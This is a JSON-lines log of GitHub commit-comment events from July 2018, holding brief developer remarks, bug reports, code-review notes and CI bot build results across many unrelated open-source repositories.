{"id":"8023704960","type":"CommitCommentEvent","actor":{"login":"GeorgyBocharov"},"repo":{"name":"GeorgyBocharov/JustFun"},"payload":{"comment":{"id":29846288,"position":null,"line":null,"path":null,"commit_id":"cdeb087ecf716500a1fe0cf5c5fbc0e59499b90c","created_at":"2018-07-26T16:05:07Z","updated_at":"2018-07-26T16:05:07Z","author_association":"OWNER","body":"sorry"}},"created_at":"2018-07-26T16:05:07Z"}
{"id":"8023707759","type":"CommitCommentEvent","actor":{"login":"cjchapman"},"repo":{"name":"adobe-type-tools/afdko"},"payload":{"comment":{"id":29846296,"position":null,"line":null,"path":null,"commit_id":"ac6ec315271f88b90e8a788b5851bb1fcd4489f2","created_at":"2018-07-26T16:05:36Z","updated_at":"2018-07-26T16:05:36Z","author_association":"CONTRIBUTOR","body":"@khaledhosny & @anthrotype Because I'm working through the C modules in alphabetical order."}},"created_at":"2018-07-26T16:05:36Z"}
{"id":"8023710002","type":"CommitCommentEvent","actor":{"login":"StoniVR"},"repo":{"name":"Fishbiter/gz3doom"},"payload":{"comment":{"id":29846303,"position":null,"line":null,"path":null,"commit_id":"044472e9b580bac93a5adcbea0203d1dc0b9b259","created_at":"2018-07-26T16:06:00Z","updated_at":"2018-07-26T16:06:00Z","author_association":"NONE","body":"Hello,\r\nIam very late here . Its Time to share my experience since openvrdoom0.3 many mods are not work any more for example The famous castlevania Mod or Metroid and much more famous mods still start with ver0.3, The Brutal Doom versions crash, when u die by Fireball of green guys or some other Dead animation or pressing a dogde key. The Projekt Brutality version and Brutal version crash on same way and have the problem that the screen is shaking when u side step and turn Head at same Time. This must be a tilt setting . I am testing since month i stream everyday on facebook doom mods in VR. https://www.facebook.com/neuste.neuer i also make youtube videos how to play doom mods show how to play quake, doom 64 mods  in VR or how to play your mod. https://www.youtube.com/user/Mosquit "}},"created_at":"2018-07-26T16:06:00Z"}
{"id":"8023712391","type":"CommitCommentEvent","actor":{"login":"rbthomp"},"repo":{"name":"saltstack/salt"},"payload":{"comment":{"id":29846309,"position":null,"line":null,"path":null,"commit_id":"0bcc9c8e9d3e3f12c14b4d3186e424cda174f7e1","created_at":"2018-07-26T16:06:25Z","updated_at":"2018-07-26T16:06:25Z","author_association":"NONE","body":"When running a state containing service.dead  using test=True, it is always reported as that something might need to be changes. Wouldn't it be more helpful if it was reported that something will actually be changed. In older releases of Salt this was the behavior now when I run a test on highstate I get a bunch of these messages making it hard to really know what is going to be changed."}},"created_at":"2018-07-26T16:06:25Z"}
{"id":"8023713006","type":"CommitCommentEvent","actor":{"login":"usercurse"},"repo":{"name":"usercurse/curso-heroes-"},"payload":{"comment":{"id":29846313,"position":null,"line":null,"path":null,"commit_id":"aff80ac928b218eca3aadba9f6d7a3a850cd7a8a","created_at":"2018-07-26T16:06:31Z","updated_at":"2018-07-26T16:06:31Z","author_association":"OWNER","body":"😄 "}},"created_at":"2018-07-26T16:06:31Z"}
{"id":"8023713241","type":"CommitCommentEvent","actor":{"login":"JackDaFlow"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":29846314,"position":null,"line":null,"path":null,"commit_id":"4237c3d9f88b3b2b9d6c43e3e51964f404f154f0","created_at":"2018-07-26T16:06:33Z","updated_at":"2018-07-26T16:06:33Z","author_association":"NONE","body":"Hey, this breaks my Probe. I'm using a BL-Touch Clone (DForce). \r\nThe settings in probe.h and G28.cpp forces the Probe to stow the probe immediately after touching the Bed. This leads to an error (BL-Touch blinking).\r\nThe changes in motion.cpp prevents stowing before homing. This leads to a crash.\r\nUsing the old settings works."}},"created_at":"2018-07-26T16:06:33Z"}
{"id":"8023713658","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":29846316,"position":null,"line":null,"path":null,"commit_id":"ce0245bb896bf17c59b8a328e902e82fc4e385b4","created_at":"2018-07-26T16:06:38Z","updated_at":"2018-07-26T16:06:38Z","author_association":"NONE","body":"TeamCity Chorus :: chorus-win32-2.6 Continuous [Build 2.6.526.aac47436bf36cd8dc46da01de2cd6543303b1542](http://build.palaso.org/viewLog.html?buildId=125732&buildTypeId=bt2) outcome was **FAILURE**\nSummary: Compilation error: src\\LibChorus\\LibChorus.csproj (new) Build time: 00:00:30"}},"created_at":"2018-07-26T16:06:38Z"}
{"id":"8023715903","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"adobe-type-tools/afdko"},"payload":{"comment":{"id":29846318,"position":null,"line":null,"path":null,"commit_id":"ac6ec315271f88b90e8a788b5851bb1fcd4489f2","created_at":"2018-07-26T16:07:01Z","updated_at":"2018-07-26T16:07:01Z","author_association":"MEMBER","body":"oh i see. let's make sure we don't duplicate efforts though :)"}},"created_at":"2018-07-26T16:07:01Z"}
{"id":"8023716272","type":"CommitCommentEvent","actor":{"login":"usercurse"},"repo":{"name":"usercurse/curso-heroes-"},"payload":{"comment":{"id":29846319,"position":null,"line":null,"path":null,"commit_id":"aff80ac928b218eca3aadba9f6d7a3a850cd7a8a","created_at":"2018-07-26T16:07:05Z","updated_at":"2018-07-26T16:07:05Z","author_association":"OWNER","body":"# Provando\r\n\r\nTodo funciona"}},"created_at":"2018-07-26T16:07:05Z"}
{"id":"8023718493","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29846320,"position":null,"line":null,"path":null,"commit_id":"b2afca673887cb5fabd61bb641c6da11ba43b368","created_at":"2018-07-26T16:07:28Z","updated_at":"2018-07-26T16:07:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [linreg - part 1 Benchmark different implementations](https://trello.com/c/Znb0cFXJ/61-linreg-part-1-benchmark-different-implementations)"}},"created_at":"2018-07-26T16:07:28Z"}
{"id":"8023720811","type":"CommitCommentEvent","actor":{"login":"shubhtrix"},"repo":{"name":"clicon/clixon"},"payload":{"comment":{"id":29846326,"position":null,"line":null,"path":null,"commit_id":"156660419e8bb1e9d08b645332310e8e4a87b773","created_at":"2018-07-26T16:07:54Z","updated_at":"2018-07-26T16:07:54Z","author_association":"NONE","body":"Nice :+1:  This will unknowingly saves a lot of time. :) "}},"created_at":"2018-07-26T16:07:54Z"}
{"id":"8023722243","type":"CommitCommentEvent","actor":{"login":"nicoleaucoin"},"repo":{"name":"nicoleaucoin/CTK"},"payload":{"comment":{"id":29846330,"position":38,"line":38,"path":"Libs/DICOM/Core/Testing/Cpp/ctkDICOMDatabaseTest8.cpp","commit_id":"247e240e6939185e3553f0188cd9ced3a69d790b","created_at":"2018-07-26T16:08:10Z","updated_at":"2018-07-26T16:08:10Z","author_association":"OWNER","body":"@jcfr Reopening work on this, do you have ideas on how to craft a test failure example that shows triggering an error when reopening the db with an invalid password?"}},"created_at":"2018-07-26T16:08:10Z"}
{"id":"8023725973","type":"CommitCommentEvent","actor":{"login":"weritos666"},"repo":{"name":"nichcream/android_device_xiaomi_land"},"payload":{"comment":{"id":29846337,"position":null,"line":null,"path":null,"commit_id":"10c192abfa0cf773c13444df292373e8a8d0cb81","created_at":"2018-07-26T16:08:52Z","updated_at":"2018-07-26T16:08:52Z","author_association":"NONE","body":"this issue happening after this only\r\nWithout this patch, there is no problem ...."}},"created_at":"2018-07-26T16:08:52Z"}
{"id":"8023734357","type":"CommitCommentEvent","actor":{"login":"r12a"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29846357,"position":39,"line":1419,"path":"index.html","commit_id":"9cb4cadeae1975c957875edeb93754d296f3d0c8","created_at":"2018-07-26T16:10:22Z","updated_at":"2018-07-26T16:10:22Z","author_association":"NONE","body":"Oops. Edited so that the code shows.\r\nAh, i see your point about accented characters not being ASCII. Doh."}},"created_at":"2018-07-26T16:10:22Z"}
{"id":"8023735395","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29846365,"position":147,"line":142,"path":"src/main/java/net/pms/dlna/SevenZipEntry.java","commit_id":"4103fac3ba25826c718fec284c3061cb070560f6","created_at":"2018-07-26T16:10:33Z","updated_at":"2018-07-26T16:10:33Z","author_association":"CONTRIBUTOR","body":"Oh yes,  seing your code make me remember that was on the error handling i hurted ;) "}},"created_at":"2018-07-26T16:10:33Z"}
{"id":"8023738899","type":"CommitCommentEvent","actor":{"login":"mhobotpplnet"},"repo":{"name":"ewbankkit/kiam"},"payload":{"comment":{"id":29846376,"position":7,"line":7,"path":"deploy/charts/kiam/.helmignore","commit_id":"f1ecf21c8120e1643ffeb140eb4317935535225a","created_at":"2018-07-26T16:11:14Z","updated_at":"2018-07-26T16:11:14Z","author_association":"NONE","body":"When cloning your repo, it does not add deploy/charts/kiam because of gitignore.\r\nWas that done on purpose? "}},"created_at":"2018-07-26T16:11:14Z"}
{"id":"8023740542","type":"CommitCommentEvent","actor":{"login":"Lisss13"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29846379,"position":20,"line":14,"path":"1/quadratic_equation.rb","commit_id":"cf19dbc0d2a4cc3b13c65f6271543e2a9e3913ba","created_at":"2018-07-26T16:11:31Z","updated_at":"2018-07-26T16:11:31Z","author_association":"OWNER","body":"забыл "}},"created_at":"2018-07-26T16:11:31Z"}
{"id":"8023741420","type":"CommitCommentEvent","actor":{"login":"nextgenusfs"},"repo":{"name":"nextgenusfs/funannotate-paper"},"payload":{"comment":{"id":29846381,"position":54,"line":67,"path":"funannotate-neurospora.sh","commit_id":"21f45dcd1783e43be0f66bff47e34bc2c83ee60f","created_at":"2018-07-26T16:11:40Z","updated_at":"2018-07-26T16:11:40Z","author_association":"OWNER","body":"Yes -- but for Ncrassa I couldn't find that data.  Not sure required for paper.  I have strand specific PE for Pdestructans, so could use that as example for updating annotation if necessary. "}},"created_at":"2018-07-26T16:11:40Z"}
{"id":"8023741753","type":"CommitCommentEvent","actor":{"login":"catchmeraman"},"repo":{"name":"catchmeraman/h3guk"},"payload":{"comment":{"id":29846382,"position":null,"line":null,"path":null,"commit_id":"62b7e256f2eca2c422a4f6df820181d0ed007995","created_at":"2018-07-26T16:11:44Z","updated_at":"2018-07-26T16:11:44Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-26T16:11:44Z"}
{"id":"8023742179","type":"CommitCommentEvent","actor":{"login":"tigerw"},"repo":{"name":"cuberite/cuberite"},"payload":{"comment":{"id":29846385,"position":10,"line":104,"path":"Tools/ProtoProxy/CMakeLists.txt","commit_id":"757231cc6e777b8f4717d1467ef7efa01c7fde15","created_at":"2018-07-26T16:11:48Z","updated_at":"2018-07-26T16:11:48Z","author_association":"MEMBER","body":"@peterbell10 \r\n\r\n> fmt::fmt\r\n\r\n????\r\n\r\nCMake only finds the library with `fmt` for me."}},"created_at":"2018-07-26T16:11:48Z"}
{"id":"8023749847","type":"CommitCommentEvent","actor":{"login":"nealmcb"},"repo":{"name":"democracyworks/ColoradoRLA"},"payload":{"comment":{"id":29846405,"position":14,"line":14,"path":"RELEASE.md","commit_id":"fdcff374faf43ccf505f712f924c0f117502d6b6","created_at":"2018-07-26T16:13:16Z","updated_at":"2018-07-26T16:13:16Z","author_association":"COLLABORATOR","body":"I think the name should match the canonical name for the tool. I figure that's either ColoradoRLA (as used in the scripts discussed), or RLATool.  And \"-release\" just makes the names longer without adding anything."}},"created_at":"2018-07-26T16:13:16Z"}
{"id":"8023751203","type":"CommitCommentEvent","actor":{"login":"Maijin"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":29846411,"position":126,"line":126,"path":"libr/anal/class.c","commit_id":"911f22149a5793cb90779e30bd29694dbbd2af11","created_at":"2018-07-26T16:13:30Z","updated_at":"2018-07-26T16:13:30Z","author_association":"COLLABORATOR","body":"isn't there an sdb print in JSON?"}},"created_at":"2018-07-26T16:13:30Z"}
{"id":"8023757740","type":"CommitCommentEvent","actor":{"login":"nealmcb"},"repo":{"name":"democracyworks/ColoradoRLA"},"payload":{"comment":{"id":29846419,"position":8,"line":8,"path":"RELEASE.md","commit_id":"fdcff374faf43ccf505f712f924c0f117502d6b6","created_at":"2018-07-26T16:14:42Z","updated_at":"2018-07-26T16:14:42Z","author_association":"COLLABORATOR","body":"What path(s)?  Can we fix this, so this can be fully automated?"}},"created_at":"2018-07-26T16:14:42Z"}
{"id":"8023758581","type":"CommitCommentEvent","actor":{"login":"tigerw"},"repo":{"name":"cuberite/cuberite"},"payload":{"comment":{"id":29846420,"position":10,"line":104,"path":"Tools/ProtoProxy/CMakeLists.txt","commit_id":"757231cc6e777b8f4717d1467ef7efa01c7fde15","created_at":"2018-07-26T16:14:51Z","updated_at":"2018-07-26T16:14:51Z","author_association":"MEMBER","body":"Though on second thoughts, it's not building so probably finding the wrong fmt."}},"created_at":"2018-07-26T16:14:51Z"}
{"id":"8023763223","type":"CommitCommentEvent","actor":{"login":"noahleigh"},"repo":{"name":"hnrysmth/missingno"},"payload":{"comment":{"id":29846432,"position":null,"line":null,"path":null,"commit_id":"c5a7756b772a2ceb3618e4c04fd2cded6f463fb1","created_at":"2018-07-26T16:15:44Z","updated_at":"2018-07-26T16:15:44Z","author_association":"CONTRIBUTOR","body":"When will this change be released to the Webstore?"}},"created_at":"2018-07-26T16:15:44Z"}
{"id":"8023763993","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29846433,"position":null,"line":null,"path":null,"commit_id":"79ffac934ee54a7b7002465cddd0395a0327aac5","created_at":"2018-07-26T16:15:53Z","updated_at":"2018-07-26T16:15:53Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-958](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-958).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-958-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T16:15:53Z"}
{"id":"8023764695","type":"CommitCommentEvent","actor":{"login":"peterbell10"},"repo":{"name":"cuberite/cuberite"},"payload":{"comment":{"id":29846435,"position":10,"line":104,"path":"Tools/ProtoProxy/CMakeLists.txt","commit_id":"757231cc6e777b8f4717d1467ef7efa01c7fde15","created_at":"2018-07-26T16:16:01Z","updated_at":"2018-07-26T16:16:01Z","author_association":"CONTRIBUTOR","body":"What version of CMake are you using?\r\n"}},"created_at":"2018-07-26T16:16:01Z"}
{"id":"8023764820","type":"CommitCommentEvent","actor":{"login":"cnuke"},"repo":{"name":"cproc/genode"},"payload":{"comment":{"id":29846437,"position":null,"line":null,"path":null,"commit_id":"c372c7fcfc3692771a2c3825c10f4d37db857637","created_at":"2018-07-26T16:16:02Z","updated_at":"2018-07-26T16:16:02Z","author_association":"NONE","body":"@cproc done."}},"created_at":"2018-07-26T16:16:02Z"}
{"id":"8023770264","type":"CommitCommentEvent","actor":{"login":"merberry"},"repo":{"name":"KarbonKitty/sheep-incremental"},"payload":{"comment":{"id":29846442,"position":null,"line":null,"path":null,"commit_id":"a8a9e0ff4c4476d50a8229dfcef2ca9ed14f31c3","created_at":"2018-07-26T16:17:02Z","updated_at":"2018-07-26T16:17:02Z","author_association":"NONE","body":"Are you also planning to put microliths into storage yards, or introduce a new building like gallery or warehouse?"}},"created_at":"2018-07-26T16:17:02Z"}
{"id":"8023772609","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29846444,"position":null,"line":null,"path":null,"commit_id":"fcca2842ce259f339792ce8f1f846bd9390857ff","created_at":"2018-07-26T16:17:28Z","updated_at":"2018-07-26T16:17:28Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [VERSION](https://github.com/pantheon-systems/documentation/commit/fcca2842ce259f339792ce8f1f846bd9390857ff/VERSION)\n"}},"created_at":"2018-07-26T16:17:28Z"}
{"id":"8023773654","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"the-j0k3r/GitHub-Community-Dark"},"payload":{"comment":{"id":29846446,"position":null,"line":null,"path":null,"commit_id":"82e6e5d7881a3631271081c58f790ba882894fb7","created_at":"2018-07-26T16:17:40Z","updated_at":"2018-07-26T16:17:40Z","author_association":"OWNER","body":"if you can configure it to ignore them maybe that will get past it idk not familiar with that tool :)"}},"created_at":"2018-07-26T16:17:40Z"}
{"id":"8023778096","type":"CommitCommentEvent","actor":{"login":"Michael-N"},"repo":{"name":"Michael-N/Michael-N.github.io"},"payload":{"comment":{"id":29846453,"position":null,"line":null,"path":null,"commit_id":"7f7ebe2a1741165d5115eefdbc957478fd43fb8d","created_at":"2018-07-26T16:18:30Z","updated_at":"2018-07-26T16:18:30Z","author_association":"OWNER","body":"Discovered Parcel.js and will begin moving away from webpack"}},"created_at":"2018-07-26T16:18:30Z"}
{"id":"8023779946","type":"CommitCommentEvent","actor":{"login":"leseb"},"repo":{"name":"ceph/ceph-ansible"},"payload":{"comment":{"id":29846456,"position":null,"line":null,"path":null,"commit_id":"d3b427e16990f9ebcde7575aae367fd7dfe36a8d","created_at":"2018-07-26T16:18:51Z","updated_at":"2018-07-26T16:18:51Z","author_association":"CONTRIBUTOR","body":"It'll be in stable-3.1, not in stable-3.0 since we don't have all the backports for Luminous. This feature is available as of mimic only which is supported by stable-3.1"}},"created_at":"2018-07-26T16:18:51Z"}
{"id":"8023782301","type":"CommitCommentEvent","actor":{"login":"wwwyue"},"repo":{"name":"wwwyue/read"},"payload":{"comment":{"id":29846461,"position":5,"line":8,"path":"fire.md","commit_id":"a8da58765ff90bd9de5ccfeca8f68bf2d2afb872","created_at":"2018-07-26T16:19:18Z","updated_at":"2018-07-26T16:19:18Z","author_association":"OWNER","body":"wo Jian shao le yi ge j"}},"created_at":"2018-07-26T16:19:18Z"}
{"id":"8023783164","type":"CommitCommentEvent","actor":{"login":"Hlcpereira"},"repo":{"name":"Hlcpereira/scripts"},"payload":{"comment":{"id":29846464,"position":null,"line":null,"path":null,"commit_id":"01c5bb1328cfb851094bfc169c6e8d85861065ed","created_at":"2018-07-26T16:19:27Z","updated_at":"2018-07-26T16:19:27Z","author_association":"OWNER","body":"???? "}},"created_at":"2018-07-26T16:19:27Z"}
{"id":"8023785737","type":"CommitCommentEvent","actor":{"login":"flixx"},"repo":{"name":"3YOURMIND/django-add-default-value"},"payload":{"comment":{"id":29846472,"position":5,"line":3,"path":"README.md","commit_id":"ae5f88f5bee4c67acf2b64f0ad9fd20358e951cd","created_at":"2018-07-26T16:19:55Z","updated_at":"2018-07-26T16:19:55Z","author_association":"CONTRIBUTOR","body":"@dodekeract you introduces a non-asccii character here and caused ~3h of work :P"}},"created_at":"2018-07-26T16:19:55Z"}
{"id":"8023786103","type":"CommitCommentEvent","actor":{"login":"AByzhynar"},"repo":{"name":"ZhdanovP/sdl_core"},"payload":{"comment":{"id":29846474,"position":3,"line":383,"path":"src/components/application_manager/src/resumption/resumption_data_db.cc","commit_id":"74f57a7656fab62831eb3e8ac544a1d3616bf7cd","created_at":"2018-07-26T16:19:58Z","updated_at":"2018-07-26T16:19:58Z","author_association":"NONE","body":"@ZhdanovP function returns uint32_t but actual returned value has uint64_t"}},"created_at":"2018-07-26T16:19:58Z"}
{"id":"8023787964","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29846480,"position":null,"line":null,"path":null,"commit_id":"cd8f41aeab471832824c9c7ac9f1d4acabebd8ae","created_at":"2018-07-26T16:20:19Z","updated_at":"2018-07-26T16:20:19Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2946 of 2946 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T16:20:19Z"}
{"id":"8023788009","type":"CommitCommentEvent","actor":{"login":"AByzhynar"},"repo":{"name":"ZhdanovP/sdl_core"},"payload":{"comment":{"id":29846481,"position":8,"line":387,"path":"src/components/application_manager/src/resumption/resumption_data_db.cc","commit_id":"74f57a7656fab62831eb3e8ac544a1d3616bf7cd","created_at":"2018-07-26T16:20:19Z","updated_at":"2018-07-26T16:20:19Z","author_association":"NONE","body":"@ZhdanovP \r\n- named wrongly according to SDL Coding Style"}},"created_at":"2018-07-26T16:20:19Z"}
{"id":"8023790054","type":"CommitCommentEvent","actor":{"login":"TungTT3"},"repo":{"name":"phamthanh2711/QuanLyKhachHang"},"payload":{"comment":{"id":29846487,"position":null,"line":null,"path":null,"commit_id":"c9c91c925232c32ea0468cc6941c45978597ae06","created_at":"2018-07-26T16:20:41Z","updated_at":"2018-07-26T16:20:41Z","author_association":"CONTRIBUTOR","body":"[03. Documents/Cài đặt SSH server trên máy ảo.docx] lúc đặt mật khẩu manager cache password\r\n\r\n![image](https://user-images.githubusercontent.com/29173113/43274773-49b3cc9a-912a-11e8-927d-e2877ec0852d.png)\r\n"}},"created_at":"2018-07-26T16:20:41Z"}
{"id":"8023793148","type":"CommitCommentEvent","actor":{"login":"vectorhacker"},"repo":{"name":"vectorhacker/pygeteventstore"},"payload":{"comment":{"id":29846494,"position":null,"line":null,"path":null,"commit_id":"b3fa2acb9bb450e037d3100a86021cc6eb2d2e4c","created_at":"2018-07-26T16:21:15Z","updated_at":"2018-07-26T16:21:15Z","author_association":"OWNER","body":"@blyxxyz a it has been done"}},"created_at":"2018-07-26T16:21:15Z"}
{"id":"8023793440","type":"CommitCommentEvent","actor":{"login":"adeloucas"},"repo":{"name":"adeloucas/cltk"},"payload":{"comment":{"id":29846495,"position":18,"line":39,"path":"cltk/tokenize/line.py","commit_id":"db621d1cce2b481b5d581a05b0b7bceb2b55ac52","created_at":"2018-07-26T16:21:18Z","updated_at":"2018-07-26T16:21:18Z","author_association":"OWNER","body":"Good catch! Fixing class name -- moving to Corpus/Akkadian."}},"created_at":"2018-07-26T16:21:18Z"}
{"id":"8023796040","type":"CommitCommentEvent","actor":{"login":"AByzhynar"},"repo":{"name":"ZhdanovP/sdl_core"},"payload":{"comment":{"id":29846500,"position":29,"line":407,"path":"src/components/application_manager/src/resumption/resumption_data_db.cc","commit_id":"74f57a7656fab62831eb3e8ac544a1d3616bf7cd","created_at":"2018-07-26T16:21:46Z","updated_at":"2018-07-26T16:21:46Z","author_association":"NONE","body":"@ZhdanovP DEBUG not INFO"}},"created_at":"2018-07-26T16:21:46Z"}
{"id":"8023801573","type":"CommitCommentEvent","actor":{"login":"MalcolmCurrie"},"repo":{"name":"Starlink/ORAC-DR"},"payload":{"comment":{"id":29846510,"position":null,"line":null,"path":null,"commit_id":"f500bb6bdab8f717f9c609daa8c1e9e27468d514","created_at":"2018-07-26T16:22:45Z","updated_at":"2018-07-26T16:22:45Z","author_association":"CONTRIBUTOR","body":"Is ORAC_HISTORY_DIR  intended only for internal use rather than\r\na shell variable for users to adjust?"}},"created_at":"2018-07-26T16:22:45Z"}
{"id":"8023801729","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29846511,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-26T16:22:47Z","updated_at":"2018-07-26T16:22:47Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-MacOS-10.9-clang: Tests Failed (2357 of 2924 tests passed, 56 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 495 tests had: ESO small diffs.\n * 563 tests had: Table big diffs.\n * 357 tests had: MTR small diffs.\n * 1 test had: BND diffs.\n * 89 tests had: ESO big diffs.\n * 99 tests had: AUD diffs.\n * 41 tests had: MTR big diffs.\n * 34 tests had: ZSZ small diffs.\n * 20 tests had: ERR diffs.\n * 2 tests had: MTD diffs.\n * 12 tests had: SSZ small diffs.\n * 3 tests had: Table small diffs.\n * 3 tests had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 56\n * Failed: 567\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.61%25-red.png)</a> \n"}},"created_at":"2018-07-26T16:22:47Z"}
{"id":"8023803643","type":"CommitCommentEvent","actor":{"login":"andrewjfreyer"},"repo":{"name":"andrewjfreyer/monitor"},"payload":{"comment":{"id":29846515,"position":16,"line":60,"path":"support/setup","commit_id":"cd37e20fd8c7b0d013ec192d183ff850e1db4bb3","created_at":"2018-07-26T16:23:10Z","updated_at":"2018-07-26T16:23:10Z","author_association":"OWNER","body":"Typo - should be the cert; update pushed"}},"created_at":"2018-07-26T16:23:10Z"}
{"id":"8023805216","type":"CommitCommentEvent","actor":{"login":"tigerw"},"repo":{"name":"cuberite/cuberite"},"payload":{"comment":{"id":29846519,"position":10,"line":104,"path":"Tools/ProtoProxy/CMakeLists.txt","commit_id":"757231cc6e777b8f4717d1467ef7efa01c7fde15","created_at":"2018-07-26T16:23:27Z","updated_at":"2018-07-26T16:23:27Z","author_association":"MEMBER","body":"Think the file is missing an add_subdirectory for fmt"}},"created_at":"2018-07-26T16:23:27Z"}
{"id":"8023809512","type":"CommitCommentEvent","actor":{"login":"mdhancher"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29846529,"position":null,"line":null,"path":null,"commit_id":"58d8db3081d7e0a3ed62121b33a60283303d8880","created_at":"2018-07-26T16:24:12Z","updated_at":"2018-07-26T16:24:12Z","author_association":"CONTRIBUTOR","body":"The recommended answer is to check \"/sys/class/dmi/id/product_name\", which will be \"Google Compute Engine\" for all modern GCE VMs (specifically, VMs started later than mid-2016)."}},"created_at":"2018-07-26T16:24:12Z"}
{"id":"8023811479","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29846535,"position":null,"line":null,"path":null,"commit_id":"4e52ed370931abfef59cb5fdc345705b2a533f78","created_at":"2018-07-26T16:24:32Z","updated_at":"2018-07-26T16:24:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [linreg_util](https://trello.com/c/E4RnxfXM/68-linregutil)"}},"created_at":"2018-07-26T16:24:32Z"}
{"id":"8023813207","type":"CommitCommentEvent","actor":{"login":"jambalayahp"},"repo":{"name":"jambalayahp/Pod"},"payload":{"comment":{"id":29846539,"position":5,"line":18,"path":"transportation.md","commit_id":"9b5991192ff0c55f5254b6e3dbd61e1cfdae26c9","created_at":"2018-07-26T16:24:50Z","updated_at":"2018-07-26T16:24:50Z","author_association":"OWNER","body":"has"}},"created_at":"2018-07-26T16:24:50Z"}
{"id":"8023815145","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29846543,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-26T16:25:11Z","updated_at":"2018-07-26T16:25:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T16:25:11Z"}
{"id":"8023815562","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29846544,"position":null,"line":null,"path":null,"commit_id":"f1484182d8ef0651cb306dedee81be96376751d9","created_at":"2018-07-26T16:25:16Z","updated_at":"2018-07-26T16:25:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [032 - Substituir DefaultHttpClient por CloseableHttpClient](https://trello.com/c/40jpwwDP/40-032-substituir-defaulthttpclient-por-closeablehttpclient)"}},"created_at":"2018-07-26T16:25:16Z"}
